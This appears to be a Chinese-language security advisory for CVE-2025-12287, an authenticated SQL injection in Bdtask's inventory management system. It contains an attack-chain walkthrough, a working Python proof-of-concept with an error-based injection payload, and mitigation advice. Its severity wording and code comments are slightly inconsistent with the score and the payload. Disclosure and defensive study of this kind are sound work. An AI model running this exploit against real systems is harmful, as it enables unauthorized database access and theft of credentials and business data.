CVE-2025-12287 Bdtask库存管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12287

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Bdtask Wholesale Inventory Control and Inventory Management System

漏洞概述

CVE-2025-12287是Bdtask Wholesale Inventory Control and Inventory Management System中的一个高危SQL注入漏洞。该系统是一款用于批发库存控制和库存管理的Web应用程序，广泛应用于中小企业进行商品库存管理、销售跟踪和供应链管理。漏洞存在于系统的个人资料编辑功能中，具体位于/Admin_dashboard/edit_profile路径下的first_name和last_name参数。攻击者可以通过构造恶意的SQL payload注入到这些参数中，从而执行未授权的SQL查询操作。由于该漏洞需要高权限用户认证才能利用，攻击面相对有限，但一旦被利用，攻击者可以窃取数据库中的敏感信息，包括用户凭证、商业数据和系统配置信息。该漏洞已于2025年10月27日公开披露，CVSS评分4.7，属于中等严重程度。漏洞利用代码已在公开渠道流传，厂商在收到安全通知后未做出任何回应，导致漏洞长期存在且无官方修复方案。

技术细节

该SQL注入漏洞源于Bdtask库存管理系统在处理用户个人资料更新请求时，未对用户输入的first_name和last_name参数进行充分的输入验证和SQL语句参数化处理。攻击者可以通过POST请求向/Admin_dashboard/edit_profile端点发送包含恶意SQL代码的请求。由于应用程序直接将用户输入拼接到SQL查询语句中，攻击者可以突破原有的查询逻辑，执行任意SQL命令。漏洞类型为基于错误的SQL注入（Error-based SQL Injection），攻击者可以通过构造特定的SQL payload触发数据库错误信息，从而逐步提取数据库中的敏感数据。常见的利用方式包括使用UNION SELECT语句联合查询、使用EXTRACTVALUE或UPDATEXML函数提取数据、或使用布尔型盲注技术进行数据推断。由于漏洞位置需要高权限认证，攻击者通常需要先获取管理员账户或通过其他方式提升权限后才能利用此漏洞。数据库中的敏感信息如用户密码哈希、管理员会话令牌、业务数据等都可能成为攻击目标。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的管理员或高权限账户访问权限

STEP 2

步骤2

攻击者登录系统并访问/Admin_dashboard/edit_profile路径

STEP 3

步骤3

攻击者构造包含SQL注入payload的POST请求，将恶意SQL代码注入到first_name或last_name参数

STEP 4

步骤4

服务器将用户输入直接拼接到SQL查询语句中未进行参数化处理

STEP 5

步骤5

恶意SQL代码在数据库中执行，触发错误信息或返回敏感数据

STEP 6

步骤6

攻击者通过错误信息或时间盲注/布尔盲注技术逐步提取数据库中的敏感信息

STEP 7

步骤7

攻击者获取用户凭证、业务数据或其他敏感信息，可能导致进一步的系统入侵

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12287 SQL Injection PoC
# Target: Bdtask Wholesale Inventory Control and Inventory Management System
# Endpoint: /Admin_dashboard/edit_profile
# Parameter: first_name or last_name

def exploit_sqli(target_url, session_cookie):
    """
    SQL Injection PoC for CVE-2025-12287
    This demonstrates extracting database version information
    """
    headers = {
        'Cookie': session_cookie,
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Payload to extract database version
    # Using error-based SQL injection with UPDATEXML
    payload = "test' AND (SELECT 7747 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -"
    
    data = {
        'first_name': payload,
        'last_name': 'test',
        'submit': 'submit'
    }
    
    try:
        response = requests.post(
            f"{target_url}/Admin_dashboard/edit_profile",
            headers=headers,
            data=data,
            timeout=30
        )
        
        if response.status_code == 200:
            print(f"[*] Request sent to {target_url}/Admin_dashboard/edit_profile")
            print(f"[*] Check response for SQL error messages containing database info")
            return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        print(f"Example: python {sys.argv[0]} http://target.com 'ci_session=abc123...'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_sqli(target, cookie)

影响范围

Bdtask Wholesale Inventory Control and Inventory Management System <= 20251013

防御指南

临时缓解措施

由于厂商未提供官方修复方案，建议立即采取以下临时缓解措施：1）限制/Admin_dashboard/edit_profile端点的访问权限，确保只有可信用户能够访问；2）在应用层实现输入验证，对first_name和last_name参数进行严格过滤；3）部署WAF规则检测和阻止SQL注入攻击特征；4）加强对数据库的监控和审计，及时发现异常查询行为；5）考虑使用Web应用防火墙或API网关进行额外的安全防护；6）如果系统不再使用，考虑暂时关闭该功能模块直到官方发布修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12287
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12287
3 Details https://www.cvedetails.com/cve/CVE-2025-12287/
4 VulDB https://vuldb.com/cve/CVE-2025-12287
5 Link https://github.com/4m3rr0r/PoCVulDb/blob/main/CVE-2025-12287.md
6 Link https://vuldb.com/?ctiid.329955
7 Link https://vuldb.com/?id.329955
8 Link https://vuldb.com/?submit.674274